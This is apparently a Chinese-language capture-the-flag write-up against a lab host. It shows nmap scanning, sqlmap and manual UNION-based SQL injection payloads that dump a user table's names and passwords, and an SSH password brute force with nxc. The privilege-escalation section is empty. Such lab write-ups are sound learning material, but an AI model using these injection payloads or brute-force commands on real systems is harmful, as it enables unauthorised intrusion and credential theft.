0x01:端口扫描
主机发现
nmap -sn 10.10.10.0/24
全端口扫描
nmap --min-rate 10000 -p- 10.10.10.133
UDP扫描
nmap -sU --top=20 10.10.10.133
详细端口扫描
nmap -sT -sC -sV -O --min-rate 10000 -p22,25,80,631 10.10.10.133
漏洞扫描
nmap --script=vuln -p22,25,80,631 10.10.10.133
0x02:web渗透
再刚刚的目录枚举中得到了以下信息
尝试sql注入
成功,直接sqlmap一把梭哈
sqlmap -u "http://10.10.10.133/index.html?page=blog&title=Blog&id=*" --dbs
根据我们之前看到的db.sql内容,我们直接查看
sqlmap -u "http://10.10.10.133/index.html?page=blog&title=Blog&id=*" -D ehks -T user --dump
我们爆破ssh
nxc ssh 10.10.10.133 -u user.txt -p pass.txt --continue-on-success
已经拿到两个了,我们登录
0x03:权限提升
0x04:总结反思
尝试手动注入
测字段
http://10.10.10.133/index.html?page=blog&title=Blog&id=1 order by 6--+
为5段
http://10.10.10.133/index.html?page=blog&title=Blog&id=0 union select 1,2,3,4,5--
查库名
http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(schema_name),4,5 FROM information_schema.schemata--
查表名
http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(table_name),4,5 From information_schema.tables WHERE table_schema='ehks'--
查列名
http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(column_name),4,5 From information_schema.columns WHERE table_name='user' AND table_schema='ehks'--
拉取数据
http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(user_id,0x7c,user_name,0x7c,user_pass),4,5 From ehks.user--
